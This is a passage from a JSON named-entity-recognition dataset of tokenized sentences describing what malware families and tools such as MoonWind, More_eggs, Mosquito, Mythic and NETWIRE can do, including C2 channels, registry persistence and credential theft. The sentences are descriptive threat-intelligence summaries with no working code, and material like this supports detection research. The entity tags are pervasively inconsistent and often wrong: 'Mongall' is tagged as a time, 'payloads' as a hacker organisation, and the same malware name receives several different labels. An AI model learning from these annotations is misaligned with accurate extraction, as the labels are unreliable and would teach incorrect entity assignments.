"B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MobileOrder", "has", "a", "command", "to", "download", "a", "file", "from", "the", "C2", "server", "to", "the", "victim", "mobile", "device's", "SD", "card." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MobileOrder", "has", "a", "command", "to", "upload", "information", "about", "all", "running", "processes", "to", "its", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MobileOrder", "has", "a", "command", "to", "upload", "to", "its", "C2", "server", "victim", "mobile", "device", "information,", "including", "IMEI,", "IMSI,", "SIM", "card", "serial", "number,", "phone", "number,", "Android", "version,", "and", "other", "information." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MoleNet", "can", "download", "additional", "payloads", "from", "the", "C2." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "MoleNet", "can", "use", "PowerShell", "to", "set", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "MoleNet", "can", "achieve", "persitence", "on", "the", "infected", "machine", "by", "setting", "the", "Registry", "run", "key." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "MoleNet", "can", "use", "WMI", "commands", "to", "check", "the", "system", "for", "firewall", "and", "antivirus", "software." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MoleNet", "can", "collect", "information", "about", "the", "about", "the", "system." ], "ner_tags": [ "B-Idus", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MoleNet", "can", "execute", "commands", "via", "the", "command", "line", "utility." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MoleNet", "can", "perform", "WMI", "commands", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Mongall", "has", "the", "ability", "to", "upload", "files", "from", "victim's", "machines." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Mongall", "has", "the", "ability", "to", "decrypt", "its", "payload", "prior", "to", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mongall", "can", "inject", "a", "DLL", "into", "`rundll32.exe`", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "B-Way", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "Mongall", "can", "upload", "files", "and", "information", "from", "a", "compromised", "host", "to", "its", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "B-Features", "I-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mongall", "can", "download", "files", "to", "targeted", "systems." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Mongall", "has", "relied", "on", "a", "user", "opening", "a", "malicious", "document", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mongall", "can", "identify", "removable", "media", "attached", "to", "compromised", "hosts." ], "ner_tags": [ "B-Time", "O", "O", "O", "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "Mongall", "can", "establish", "persistence", "with", "the", "auto", "start", "function", "including", "using", "the", "value", "`EverNoteTrayUService`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mongall", "can", "use", "`rundll32.exe`", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "Mongall", "has", "been", "packed", "with", "Themida." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Mongall", "can", "use", "Base64", "to", "encode", "information", "sent", "to", "its", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mongall", "has", "the", "ability", "to", "RC4", "encrypt", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "Mongall", "can", "identify", "drives", "on", "compromised", "hosts", "and", "retrieve", "the", "hostname", "via", "`gethostbyname`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mongall", "can", "use", "HTTP", "for", "C2", "communication." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "MoonWind", "can", "delete", "itself", "or", "specified", "files." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "MoonWind", "has", "a", "command", "to", "return", "a", "directory", "listing", "for", "a", "specified", "directory." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MoonWind", "has", "a", "keylogger." ], "ner_tags": [ "B-Way", "O", "O", "B-Way" ] }, { "tokens": [ "MoonWind", "saves", "information", "from", "its", "keylogging", "routine", "as", "a", ".zip", "file", "in", "the", "present", "working", "directory." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MoonWind", "completes", "network", "communication", "via", "raw", "sockets." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MoonWind", "communicates", "over", "ports", "80,", "443,", "53,", "and", "8080", "via", "raw", "sockets", "instead", "of", "the", "protocols", "usually", "associated", "with", "the", "ports." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MoonWind", "obtains", "the", "number", "of", "removable", "drives", "from", "the", "victim." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MoonWind", "has", "a", "command", "to", "return", "a", "list", "of", "running", "processes." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MoonWind", "encrypts", "C2", "traffic", "using", "RC4", "with", "a", "static", "key." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MoonWind", "can", "obtain", "the", "victim", "hostname,", "Windows", "version,", "RAM", "amount,", "number", "of", "drives,", "and", "screen", "resolution." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MoonWind", "obtains", "the", "victim", "IP", "address." ], "ner_tags": [ "B-Way", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "MoonWind", "obtains", "the", "victim", "username." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "MoonWind", "obtains", "the", "victim's", "current", "time." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MoonWind", "can", "execute", "commands", "via", "an", "interactive", "command", "shell.", "MoonWind", "uses", "batch", "scripts", "for", "various", "purposes,", "including", "to", "restart", "and", "uninstall", "itself." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MoonWind", "installs", "itself", "as", "a", "new", "service", "with", "automatic", "startup", "to", "establish", "persistence.", "The", "service", "checks", "every", "60", "seconds", "to", "determine", "if", "the", "malware", "is", "running;", "if", "not,", "it", "will", "spawn", "a", "new", "instance." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "More_eggs", "has", "used", "a", "signed", "binary", "shellcode", "loader", "and", "a", "signed", "Dynamic", "Link", "Library", "(DLL)", "to", "create", "a", "reverse", "shell." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "More_eggs", "will", "decode", "malware", "components", "that", "are", "then", "dropped", "to", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "More_eggs's", "payload", "has", "been", "encrypted", "with", "a", "key", "that", "has", "the", "hostname", "and", "processor", "family", "information", "appended", "to", "the", "end." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "More_eggs", "can", "remove", "itself", "from", "a", "system." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "More_eggs", "can", "download", "and", "launch", "additional", "payloads." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "More_eggs", "has", "used", "HTTP", "GET", "requests", "to", "check", "internet", "connectivity." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "More_eggs", "has", "used", "regsvr32.exe", "to", "execute", "the", "malicious", "DLL." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "More_eggs", "can", "obtain", "information", "on", "installed", "anti-malware", "programs." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "More_eggs", "has", "used", "basE91", "encoding,", "along", "with", "encryption,", "for", "C2", "communication." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "More_eggs", "has", "used", "an", "RC4-based", "encryption", "method", "for", "its", "C2", "communications." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "More_eggs", "has", "the", "capability", "to", "gather", "the", "OS", "version", "and", "computer", "name." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "More_eggs", "has", "the", "capability", "to", "gather", "the", "IP", "address", "from", "the", "victim's", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "More_eggs", "has", "the", "capability", "to", "gather", "the", "username", "from", "the", "victim's", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "More_eggs", "uses", "HTTPS", "for", "C2." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "O", "O" ] }, { "tokens": [ "More_eggs", "has", "used", "cmd.exe", "for", "execution." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "Mori", "can", "use", "DNS", "tunneling", "to", "communicate", "with", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Mori", "can", "resolve", "networking", "APIs", "from", "strings", "that", "are", "ADD-encrypted." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mori", "can", "delete", "its", "DLL", "file", "and", "related", "files", "by", "Registry", "value." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mori", "has", "obfuscated", "the", "FML.dll", "with", "200MB", "of", "junk", "data." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mori", "can", "write", "data", "to", "`HKLM\\Software\\NFC\\IPA`", "and", "`HKLM\\Software\\NFC\\`", "and", "delete", "Registry", "values." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mori", "can", "read", "data", "from", "the", "Registry", "including", "from", "`HKLM\\Software\\NFC\\IPA`", "and", "`HKLM\\Software\\NFC\\`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mori", "can", "use", "`regsvr32.exe`", "for", "DLL", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Mori", "can", "use", "Base64", "encoded", "JSON", "libraries", "used", "in", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mori", "can", "communicate", "using", "HTTP", "over", "IPv4", "or", "IPv6", "depending", "on", "a", "flag", "set." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mosquito", "uses", "COM", "hijacking", "as", "a", "method", "of", "persistence." ], "ner_tags": [ "B-Org", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mosquito’s", "installer", "is", "obfuscated", "with", "a", "custom", "crypter", "to", "obfuscate", "the", "installer." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Mosquito", "deletes", "files", "using", "DeleteFileW", "API", "call." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Mosquito", "stores", "configuration", "values", "under", "the", "Registry", "key", "<code>HKCU\\Software\\Microsoft\\[dllname]</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mosquito", "can", "upload", "and", "download", "files", "to", "the", "victim." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Mosquito", "can", "modify", "Registry", "keys", "under", "<code>HKCU\\Software\\Microsoft\\[dllname]</code>", "to", "store", "configuration", "values.", "Mosquito", "also", "modifies", "Registry", "keys", "under", "<code>HKCR\\CLSID\\...\\InprocServer32</code>", "with", "a", "path", "to", "the", "launcher." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mosquito", "leverages", "the", "CreateProcess()", "and", "LoadLibrary()", "calls", "to", "execute", "files", "with", "the", ".dll", "and", ".exe", "extensions." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O" ] }, { "tokens": [ "Mosquito", "can", "launch", "PowerShell", "Scripts." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Mosquito", "runs", "<code>tasklist</code>", "to", "obtain", "running", "processes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mosquito", "establishes", "persistence", "under", "the", "Registry", "key", "<code>HKCU\\Software\\Run", "auto_update</code>." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Mosquito's", "launcher", "uses", "rundll32.exe", "in", "a", "Registry", "Key", "value", "to", "start", "the", "main", "backdoor", "capability." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mosquito's", "installer", "searches", "the", "Registry", "and", "system", "to", "see", "if", "specific", "antivirus", "tools", "are", "installed", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mosquito", "uses", "a", "custom", "encryption", "algorithm,", "which", "consists", "of", "XOR", "and", "a", "stream", "that", "is", "similar", "to", "the", "Blum", "Blum", "Shub", "algorithm." ], "ner_tags": [ "B-Org", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "Mosquito", "uses", "the", "<code>ipconfig</code>", "command." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Mosquito", "runs", "<code>whoami</code>", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mosquito", "executes", "cmd.exe", "and", "uses", "a", "pipe", "to", "read", "the", "results", "and", "send", "back", "the", "output", "to", "the", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mosquito's", "installer", "uses", "WMI", "to", "search", "for", "antivirus", "display", "names." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mythic", "supports", "SSL", "encrypted", "C2." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Mythic", "supports", "scripting", "of", "file", "downloads", "from", "agents." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mythic", "supports", "DNS-based", "C2", "profiles." ], "ner_tags": [ "B-Way", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "Mythic", "provides", "various", "transform", "functions", "to", "encode", "and/or", "randomize", "C2", "data." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mythic", "supports", "custom", "chunk", "sizes", "used", "to", "upload/download", "files." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "Mythic", "supports", "domain", "fronting", "via", "custom", "request", "headers." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Mythic", "can", "leverage", "a", "modified", "SOCKS5", "proxy", "to", "tunnel", "egress", "C2", "traffic." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mythic", "can", "use", "a", "list", "of", "C2", "URLs", "as", "fallback", "mechanisms", "in", "case", "one", "IP", "or", "domain", "gets", "blocked." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mythic", "supports", "SMB-based", "peer-to-peer", "C2", "profiles." ], "ner_tags": [ "B-Way", "O", "B-Way", "B-Way", "B-Tool", "O" ] }, { "tokens": [ "Mythic", "can", "leverage", "a", "peer-to-peer", "C2", "profile", "between", "agents." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Mythic", "supports", "WebSocket", "and", "TCP-based", "C2", "profiles." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "B-Way", "B-Tool", "O" ] }, { "tokens": [ "Mythic", "can", "use", "SOCKS", "proxies", "to", "tunnel", "traffic", "through", "another", "protocol." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Mythic", "supports", "HTTP-based", "C2", "profiles." ], "ner_tags": [ "B-Way", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "NBTscan", "can", "be", "used", "to", "scan", "IP", "networks." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "NBTscan", "can", "dump", "and", "print", "whole", "packet", "content." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NBTscan", "can", "list", "NetBIOS", "computer", "names." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NBTscan", "can", "be", "used", "to", "collect", "MAC", "addresses." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "NBTscan", "can", "list", "active", "users", "on", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NDiskMonitor", "can", "obtain", "a", "list", "of", "all", "files", "and", "directories", "as", "well", "as", "logical", "drives." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NDiskMonitor", "can", "download", "and", "execute", "a", "file", "from", "given", "URL." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NDiskMonitor", "uses", "AES", "to", "encrypt", "certain", "information", "sent", "over", "its", "C2", "channel." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NDiskMonitor", "obtains", "the", "victim", "computer", "name", "and", "encrypts", "the", "information", "to", "send", "over", "its", "C2", "channel." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NDiskMonitor", "obtains", "the", "victim", "username", "and", "encrypts", "the", "information", "to", "send", "over", "its", "C2", "channel." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Adversaries", "can", "also", "use", "NETEAGLE", "to", "establish", "an", "RDP", "connection", "with", "a", "controller", "over", "TCP/7519." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Idus" ] }, { "tokens": [ "NETEAGLE", "can", "use", "HTTP", "to", "download", "resources", "that", "contain", "an", "IP", "address", "and", "port", "number", "pair", "to", "connect", "to", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NETEAGLE", "is", "capable", "of", "reading", "files", "over", "the", "C2", "channel." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "NETEAGLE", "will", "attempt", "to", "detect", "if", "the", "infected", "host", "is", "configured", "to", "a", "proxy.", "If", "so,", "NETEAGLE", "will", "send", "beacons", "via", "an", "HTTP", "POST", "request;", "otherwise", "it", "will", "send", "beacons", "via", "UDP/6000." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "NETEAGLE", "allows", "adversaries", "to", "enumerate", "and", "modify", "the", "infected", "host's", "file", "system.", "It", "supports", "searching", "for", "directories,", "creating", "directories,", "listing", "directory", "contents,", "reading", "and", "writing", "to", "files,", "retrieving", "file", "attributes,", "and", "retrieving", "volume", "information." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "I-Features", "B-HackOrg", "I-Features", "I-Features", "O", "B-Features", "O", "I-Features", "I-Features", "O", "B-Features", "I-Features", "O", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "If", "NETEAGLE", "does", "not", "detect", "a", "proxy", "configured", "on", "the", "infected", "machine,", "it", "will", "send", "beacons", "via", "UDP/6000.", "Also,", "after", "retrieving", "a", "C2", "IP", "address", "and", "Port", "Number,", "NETEAGLE", "will", "initiate", "a", "TCP", "connection", "to", "this", "socket.", "The", "ensuing", "connection", "is", "a", "plaintext", "C2", "channel", "in", "which", "commands", "are", "specified", "by", "DWORDs." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NETEAGLE", "can", "send", "process", "listings", "over", "the", "C2", "channel." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "\"SCOUT\"", "variant", "of", "NETEAGLE", "achieves", "persistence", "by", "adding", "itself", "to", "the", "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run</code>", "Registry", "key." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "NETEAGLE", "will", "decrypt", "resources", "it", "downloads", "with", "HTTP", "requests", "by", "using", "RC4", "with", "the", "key", "\"ScoutEagle.\"" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "NETEAGLE", "will", "attempt", "to", "detect", "if", "the", "infected", "host", "is", "configured", "to", "a", "proxy.", "If", "so,", "NETEAGLE", "will", "send", "beacons", "via", "an", "HTTP", "POST", "request.", "NETEAGLE", "will", "also", "use", "HTTP", "to", "download", "resources", "that", "contain", "an", "IP", "address", "and", "Port", "Number", "pair", "to", "connect", "to", "for", "further", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NETEAGLE", "allows", "adversaries", "to", "execute", "shell", "commands", "on", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "NETWIRE", "can", "discover", "and", "close", "windows", "on", "controlled", "systems." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "NETWIRE", "has", "the", "ability", "to", "compress", "archived", "screenshots." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NETWIRE", "has", "used", "a", "custom", "encryption", "algorithm", "to", "encrypt", "collected", "data." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "NETWIRE", "can", "automatically", "archive", "collected", "data." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "NETWIRE", "can", "retrieve", "passwords", "from", "messaging", "and", "mail", "client", "applications." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NETWIRE", "has", "the", "ability", "to", "steal", "credentials", "from", "web", "browsers", "including", "Internet", "Explorer,", "Opera,", "Yandex,", "and", "Chrome." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "I-Tool", "O", "B-Tool", "B-Way", "O", "B-Way" ] }, { "tokens": [ "NETWIRE", "can", "use", "crontabs", "to", "establish", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "NETWIRE", "can", "encrypt", "C2", "communications." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features" ] }, { "tokens": [ "NETWIRE", "has", "the", "ability", "to", "search", "for", "files", "on", "the", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "NETWIRE", "can", "store", "its", "configuration", "information", "in", "the", "Registry", "under", 